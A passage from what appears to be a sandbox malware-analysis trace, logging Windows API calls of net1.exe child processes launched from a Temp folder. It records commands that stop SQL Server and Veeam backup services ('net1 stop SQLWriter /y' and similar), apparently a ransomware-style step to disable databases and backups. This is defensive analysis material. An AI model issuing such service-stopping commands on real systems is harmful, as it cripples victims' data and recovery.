returned -18 [0126.272] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0126.272] _wcsicmp (_String1="config", _String2="stop") returned -16 [0126.272] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0126.272] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0126.272] _wcsicmp (_String1="file", _String2="stop") returned -13 [0126.272] _wcsicmp (_String1="files", _String2="stop") returned -13 [0126.272] _wcsicmp (_String1="group", _String2="stop") returned -12 [0126.272] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0126.272] _wcsicmp (_String1="help", _String2="stop") returned -11 [0126.272] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0126.272] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0126.272] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0126.272] _wcsicmp (_String1="session", _String2="stop") returned -15 [0126.272] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0126.272] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0126.272] _wcsicmp (_String1="share", _String2="stop") returned -12 [0126.272] _wcsicmp (_String1="start", _String2="stop") returned -14 [0126.273] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0126.273] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0126.273] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0126.273] _wcsicmp (_String1="accounts", _String2="SQLWriter") returned -18 [0126.273] _wcsicmp (_String1="computer", _String2="SQLWriter") returned -16 [0126.273] _wcsicmp (_String1="config", _String2="SQLWriter") returned -16 [0126.273] _wcsicmp (_String1="continue", _String2="SQLWriter") returned -16 [0126.273] _wcsicmp (_String1="cont", _String2="SQLWriter") returned -16 [0126.273] _wcsicmp (_String1="file", _String2="SQLWriter") returned -13 [0126.273] _wcsicmp (_String1="files", _String2="SQLWriter") returned -13 [0126.273] _wcsicmp (_String1="group", _String2="SQLWriter") returned -12 [0126.273] _wcsicmp (_String1="groups", _String2="SQLWriter") returned -12 [0126.273] _wcsicmp (_String1="help", _String2="SQLWriter") returned -11 [0126.273] _wcsicmp (_String1="helpmsg", _String2="SQLWriter") returned -11 [0126.273] _wcsicmp (_String1="localgroup", _String2="SQLWriter") returned -7 [0126.273] _wcsicmp (_String1="pause", _String2="SQLWriter") returned -3 [0126.273] _wcsicmp (_String1="session", _String2="SQLWriter") returned -12 [0126.273] _wcsicmp (_String1="sessions", _String2="SQLWriter") returned -12 [0126.273] _wcsicmp (_String1="sess", _String2="SQLWriter") returned -12 [0126.273] _wcsicmp (_String1="share", _String2="SQLWriter") returned -9 [0126.273] _wcsicmp (_String1="start", _String2="SQLWriter") returned 3 [0126.273] _wcsicmp (_String1="stats", _String2="SQLWriter") returned 3 [0126.273] _wcsicmp (_String1="statistics", _String2="SQLWriter") returned 3 [0126.273] _wcsicmp (_String1="stop", _String2="SQLWriter") returned 3 [0126.273] _wcsicmp (_String1="time", _String2="SQLWriter") returned 1 [0126.273] _wcsicmp (_String1="user", _String2="SQLWriter") returned 2 [0126.273] _wcsicmp (_String1="users", _String2="SQLWriter") returned 2 [0126.273] _wcsicmp (_String1="msg", _String2="SQLWriter") returned -6 [0126.273] _wcsicmp (_String1="messenger", _String2="SQLWriter") returned -6 [0126.273] _wcsicmp (_String1="receiver", _String2="SQLWriter") returned -1 [0126.273] _wcsicmp (_String1="rcv", _String2="SQLWriter") returned -1 [0126.273] _wcsicmp (_String1="netpopup", _String2="SQLWriter") returned -5 [0126.273] _wcsicmp (_String1="redirector", _String2="SQLWriter") returned -1 [0126.273] _wcsicmp (_String1="redir", _String2="SQLWriter") returned -1 [0126.273] _wcsicmp (_String1="rdr", _String2="SQLWriter") returned -1 [0126.273] _wcsicmp (_String1="workstation", _String2="SQLWriter") returned 4 [0126.274] _wcsicmp (_String1="work", _String2="SQLWriter") returned 4 [0126.274] _wcsicmp (_String1="wksta", _String2="SQLWriter") returned 4 [0126.274] _wcsicmp (_String1="prdr", _String2="SQLWriter") returned -3 [0126.274] _wcsicmp (_String1="devrdr", _String2="SQLWriter") returned -15 [0126.274] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWriter") returned -7 [0126.274] _wcsicmp (_String1="server", _String2="SQLWriter") returned -12 [0126.274] _wcsicmp (_String1="svr", _String2="SQLWriter") returned 5 [0126.274] _wcsicmp (_String1="srv", _String2="SQLWriter") returned 1 [0126.274] _wcsicmp (_String1="lanmanserver", _String2="SQLWriter") returned -7 [0126.274] _wcsicmp (_String1="alerter", _String2="SQLWriter") returned -18 [0126.274] _wcsicmp (_String1="netlogon", _String2="SQLWriter") returned -5 [0126.274] _wcsupr (in: _String="SQLWriter" | out: _String="SQLWRITER") returned="SQLWRITER" [0126.274] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7354a8 [0126.668] GetServiceKeyNameW (in: hSCManager=0x7354a8, lpDisplayName="SQLWRITER", lpServiceName=0xe5aaf0, lpcchBuffer=0x33fb68 | out: lpServiceName="", lpcchBuffer=0x33fb68) returned 0 [0126.669] _wcsicmp (_String1="msg", _String2="SQLWRITER") returned -6 [0126.669] _wcsicmp (_String1="messenger", _String2="SQLWRITER") returned -6 [0126.669] _wcsicmp (_String1="receiver", _String2="SQLWRITER") returned -1 [0126.669] _wcsicmp (_String1="rcv", _String2="SQLWRITER") returned -1 [0126.669] _wcsicmp (_String1="redirector", _String2="SQLWRITER") returned -1 [0126.669] _wcsicmp (_String1="redir", _String2="SQLWRITER") returned -1 [0126.669] _wcsicmp (_String1="rdr", _String2="SQLWRITER") returned -1 [0126.669] _wcsicmp (_String1="workstation", _String2="SQLWRITER") returned 4 [0126.669] _wcsicmp (_String1="work", _String2="SQLWRITER") returned 4 [0126.669] _wcsicmp (_String1="wksta", _String2="SQLWRITER") returned 4 [0126.669] _wcsicmp (_String1="prdr", _String2="SQLWRITER") returned -3 [0126.669] _wcsicmp (_String1="devrdr", _String2="SQLWRITER") returned -15 [0126.669] _wcsicmp (_String1="lanmanworkstation", _String2="SQLWRITER") returned -7 [0126.669] _wcsicmp (_String1="server", _String2="SQLWRITER") returned -12 [0126.669] _wcsicmp (_String1="svr", _String2="SQLWRITER") returned 5 [0126.669] _wcsicmp (_String1="srv", _String2="SQLWRITER") returned 1 [0126.669] _wcsicmp (_String1="lanmanserver", _String2="SQLWRITER") returned -7 [0126.669] _wcsicmp (_String1="alerter", _String2="SQLWRITER") returned -18 [0126.669] _wcsicmp (_String1="netlogon", _String2="SQLWRITER") returned -5 [0126.670] NetServiceControl (in: servername=0x0, service="SQLWRITER", opcode=0x0, arg=0x0, bufptr=0x33fb64 | out: bufptr=0x33fb64) returned 0x889 [0126.671] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0126.671] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0126.672] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0126.673] GetFileType (hFile=0x0) returned 0x0 [0126.673] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x733ec0 [0126.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x733ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0126.673] WriteFile (in: hFile=0x0, lpBuffer=0x733ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x33faa4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33faa4, lpOverlapped=0x0) returned 0 [0126.673] LocalFree (hMem=0x733ec0) returned 0x0 [0126.673] GetFileType (hFile=0x0) returned 0x0 [0126.673] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x736170 [0126.673] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x736170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ns", lpUsedDefaultChar=0x0) returned 2 [0126.673] WriteFile (in: hFile=0x0, lpBuffer=0x736170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33faa4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33faa4, lpOverlapped=0x0) returned 0 [0126.673] LocalFree (hMem=0x736170) returned 0x0 [0126.673] _ultow (in: _Dest=0x889, _Radix=3406548 | out: _Dest=0x889) returned="2185" [0126.674] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0126.674] GetFileType (hFile=0x0) returned 0x0 [0126.674] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x736170 [0126.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x736170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0126.674] WriteFile (in: hFile=0x0, lpBuffer=0x736170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x33fab0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fab0, lpOverlapped=0x0) returned 0 [0126.674] LocalFree (hMem=0x736170) returned 0x0 [0126.674] GetFileType (hFile=0x0) returned 0x0 [0126.674] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x736170 [0126.674] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x736170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ns", lpUsedDefaultChar=0x0) returned 2 [0126.674] WriteFile (in: hFile=0x0, lpBuffer=0x736170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x33fab0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x33fab0, lpOverlapped=0x0) returned 0 [0126.674] LocalFree (hMem=0x736170) returned 0x0 [0126.674] NetApiBufferFree (Buffer=0x731ae0) returned 0x0 [0126.674] NetApiBufferFree (Buffer=0x731af8) returned 0x0 [0126.674] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLWriter /y" [0126.675] exit (_Code=2) Process: id = "279" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x59c23000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "116" os_parent_pid = "0xad4" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 677 os_tid = 0xc60 [0125.459] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ff86c | out: lpSystemTimeAsFileTime=0x2ff86c*(dwLowDateTime=0x1e84f770, dwHighDateTime=0x1d6f0d1)) [0125.459] GetCurrentProcessId () returned 0xde0 [0125.459] GetCurrentThreadId () returned 0xc60 [0125.459] GetTickCount () returned 0x11529bf [0125.459] QueryPerformanceCounter (in: lpPerformanceCount=0x2ff864 | out: lpPerformanceCount=0x2ff864*=24455960683) returned 1 [0125.459] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.459] __set_app_type (_Type=0x1) [0125.459] __p__fmode () returned 0x770331f4 [0125.459] __p__commode () returned 0x770331fc [0125.459] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.459] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068) returned 0 [0125.460] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.460] GetConsoleOutputCP () returned 0x1b5 [0125.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe59080 | out: lpCPInfo=0xe59080) returned 1 [0125.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0125.463] sprintf_s (in: _DstBuf=0x2ff824, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0125.463] setlocale (category=0, locale=".437") returned="English_United States.437" [0125.465] GetStdHandle (nStdHandle=0xfffffff5) returned 0x470 [0125.465] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0125.465] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" [0125.465] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff5f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0125.465] RtlAllocateHeap (HeapHandle=0x6c0000, Flags=0x0, Size=0x8e) returned 0x6d4ae0 [0125.465] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0125.466] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff7f4 | out: Buffer=0x2ff7f4*=0x6d1b18) returned 0x0 [0125.466] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff7f4 | out: Buffer=0x2ff7f4*=0x6d1b30) returned 0x0 [0125.466] _fileno (_File=0x77032900) returned -2 [0125.466] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0125.466] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0125.466] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0125.466] _wcsicmp (_String1="config", _String2="stop") returned -16 [0125.466] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0125.466] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0125.466] _wcsicmp (_String1="file", _String2="stop") returned -13 [0125.466] _wcsicmp (_String1="files", _String2="stop") returned -13 [0125.466] _wcsicmp (_String1="group", _String2="stop") returned -12 [0125.466] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0125.466] _wcsicmp (_String1="help", _String2="stop") returned -11 [0125.466] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0125.466] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0125.466] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0125.466] _wcsicmp (_String1="session", _String2="stop") returned -15 [0125.466] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0125.466] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0125.466] _wcsicmp (_String1="share", _String2="stop") returned -12 [0125.466] _wcsicmp (_String1="start", _String2="stop") returned -14 [0125.466] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0125.466] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0125.466] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0125.466] _wcsicmp (_String1="accounts", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0125.466] _wcsicmp (_String1="computer", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0125.466] _wcsicmp (_String1="config", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0125.466] _wcsicmp (_String1="continue", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0125.467] _wcsicmp (_String1="cont", _String2="MSSQLFDLauncher$SBSMONITORING") returned -10 [0125.467] _wcsicmp (_String1="file", _String2="MSSQLFDLauncher$SBSMONITORING") returned -7 [0125.467] _wcsicmp (_String1="files", _String2="MSSQLFDLauncher$SBSMONITORING") returned -7 [0125.467] _wcsicmp (_String1="group", _String2="MSSQLFDLauncher$SBSMONITORING") returned -6 [0125.467] _wcsicmp (_String1="groups", _String2="MSSQLFDLauncher$SBSMONITORING") returned -6 [0125.467] _wcsicmp (_String1="help", _String2="MSSQLFDLauncher$SBSMONITORING") returned -5 [0125.467] _wcsicmp (_String1="helpmsg", _String2="MSSQLFDLauncher$SBSMONITORING") returned -5 [0125.467] _wcsicmp (_String1="localgroup", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0125.467] _wcsicmp (_String1="pause", _String2="MSSQLFDLauncher$SBSMONITORING") returned 3 [0125.467] _wcsicmp (_String1="session", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="sessions", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="sess", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="share", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="start", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="stats", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="statistics", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="stop", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.467] _wcsicmp (_String1="time", _String2="MSSQLFDLauncher$SBSMONITORING") returned 7 [0125.467] _wcsicmp (_String1="user", _String2="MSSQLFDLauncher$SBSMONITORING") returned 8 [0125.467] _wcsicmp (_String1="users", _String2="MSSQLFDLauncher$SBSMONITORING") returned 8 [0125.467] _wcsicmp (_String1="msg", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0125.467] _wcsicmp (_String1="messenger", _String2="MSSQLFDLauncher$SBSMONITORING") returned -14 [0125.467] _wcsicmp (_String1="receiver", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0125.467] _wcsicmp (_String1="rcv", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0125.467] _wcsicmp (_String1="netpopup", _String2="MSSQLFDLauncher$SBSMONITORING") returned 1 [0125.467] _wcsicmp (_String1="redirector", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0125.467] _wcsicmp (_String1="redir", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0125.467] _wcsicmp (_String1="rdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 5 [0125.467] _wcsicmp (_String1="workstation", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0125.467] _wcsicmp (_String1="work", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0125.467] _wcsicmp (_String1="wksta", _String2="MSSQLFDLauncher$SBSMONITORING") returned 10 [0125.467] _wcsicmp (_String1="prdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 3 [0125.467] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLauncher$SBSMONITORING") returned -9 [0125.468] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0125.468] _wcsicmp (_String1="server", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.468] _wcsicmp (_String1="svr", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.468] _wcsicmp (_String1="srv", _String2="MSSQLFDLauncher$SBSMONITORING") returned 6 [0125.468] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLauncher$SBSMONITORING") returned -1 [0125.468] _wcsicmp (_String1="alerter", _String2="MSSQLFDLauncher$SBSMONITORING") returned -12 [0125.468] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLauncher$SBSMONITORING") returned 1 [0125.468] _wcsupr (in: _String="MSSQLFDLauncher$SBSMONITORING" | out: _String="MSSQLFDLAUNCHER$SBSMONITORING") returned="MSSQLFDLAUNCHER$SBSMONITORING" [0125.468] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6d54d0 [0125.802] GetServiceKeyNameW (in: hSCManager=0x6d54d0, lpDisplayName="MSSQLFDLAUNCHER$SBSMONITORING", lpServiceName=0xe5aaf0, lpcchBuffer=0x2ff790 | out: lpServiceName="", lpcchBuffer=0x2ff790) returned 0 [0125.803] _wcsicmp (_String1="msg", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -12 [0125.803] _wcsicmp (_String1="messenger", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -14 [0125.803] _wcsicmp (_String1="receiver", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0125.803] _wcsicmp (_String1="rcv", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0125.803] _wcsicmp (_String1="redirector", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0125.803] _wcsicmp (_String1="redir", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0125.803] _wcsicmp (_String1="rdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 5 [0125.803] _wcsicmp (_String1="workstation", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0125.803] _wcsicmp (_String1="work", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0125.803] _wcsicmp (_String1="wksta", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 10 [0125.803] _wcsicmp (_String1="prdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 3 [0125.803] _wcsicmp (_String1="devrdr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -9 [0125.803] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -1 [0125.803] _wcsicmp (_String1="server", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0125.803] _wcsicmp (_String1="svr", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0125.803] _wcsicmp (_String1="srv", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 6 [0125.803] _wcsicmp (_String1="lanmanserver", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -1 [0125.803] _wcsicmp (_String1="alerter", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned -12 [0125.803] _wcsicmp (_String1="netlogon", _String2="MSSQLFDLAUNCHER$SBSMONITORING") returned 1 [0125.803] NetServiceControl (in: servername=0x0, service="MSSQLFDLAUNCHER$SBSMONITORING", opcode=0x0, arg=0x0, bufptr=0x2ff78c | out: bufptr=0x2ff78c) returned 0x889 [0125.804] wcscpy_s (in: _Destination=0xe5a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0125.804] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74420000 [0125.805] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74420000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0125.806] GetFileType (hFile=0x0) returned 0x0 [0125.806] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6d3b50 [0125.806] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6d3b50, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0125.806] WriteFile (in: hFile=0x0, lpBuffer=0x6d3b50, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ff6cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff6cc, lpOverlapped=0x0) returned 0 [0125.806] LocalFree (hMem=0x6d3b50) returned 0x0 [0125.806] GetFileType (hFile=0x0) returned 0x0 [0125.806] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d6188 [0125.806] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6d6188, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nm", lpUsedDefaultChar=0x0) returned 2 [0125.806] WriteFile (in: hFile=0x0, lpBuffer=0x6d6188, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff6cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff6cc, lpOverlapped=0x0) returned 0 [0125.807] LocalFree (hMem=0x6d6188) returned 0x0 [0125.807] _ultow (in: _Dest=0x889, _Radix=3143420 | out: _Dest=0x889) returned="2185" [0125.807] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74420000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xe5b338, nSize=0x800, Arguments=0xe59dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0125.807] GetFileType (hFile=0x0) returned 0x0 [0125.807] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6d6188 [0125.807] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6d6188, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0125.807] WriteFile (in: hFile=0x0, lpBuffer=0x6d6188, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ff6d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff6d8, lpOverlapped=0x0) returned 0 [0125.807] LocalFree (hMem=0x6d6188) returned 0x0 [0125.807] GetFileType (hFile=0x0) returned 0x0 [0125.807] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d6188 [0125.807] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6d6188, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nm", lpUsedDefaultChar=0x0) returned 2 [0125.807] WriteFile (in: hFile=0x0, lpBuffer=0x6d6188, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff6d8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff6d8, lpOverlapped=0x0) returned 0 [0125.807] LocalFree (hMem=0x6d6188) returned 0x0 [0125.807] NetApiBufferFree (Buffer=0x6d1b18) returned 0x0 [0125.808] NetApiBufferFree (Buffer=0x6d1b30) returned 0x0 [0125.808] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLFDLauncher$SBSMONITORING /y" [0125.808] exit (_Code=2) Process: id = "280" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x50b1a000" os_pid = "0xc08" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "112" os_parent_pid = "0x7d8" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2008R2 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 678 os_tid = 0xf20 [0125.493] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fac4 | out: lpSystemTimeAsFileTime=0x23fac4*(dwLowDateTime=0x1e89ba30, dwHighDateTime=0x1d6f0d1)) [0125.493] GetCurrentProcessId () returned 0xc08 [0125.493] GetCurrentThreadId () returned 0xf20 [0125.493] GetTickCount () returned 0x11529df [0125.493] QueryPerformanceCounter (in: lpPerformanceCount=0x23fabc | out: lpPerformanceCount=0x23fabc*=24459413072) returned 1 [0125.494] GetModuleHandleA (lpModuleName=0x0) returned 0xe40000 [0125.494] __set_app_type (_Type=0x1) [0125.494] __p__fmode () returned 0x770331f4 [0125.494] __p__commode () returned 0x770331fc [0125.494] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe4ffe6) returned 0x0 [0125.494] __getmainargs (in: _Argc=0xe59064, _Argv=0xe5906c, _Env=0xe59068, _DoWildCard=0, _StartInfo=0xe59024 | out: _Argc=0xe59064, _Argv=0xe5906c, 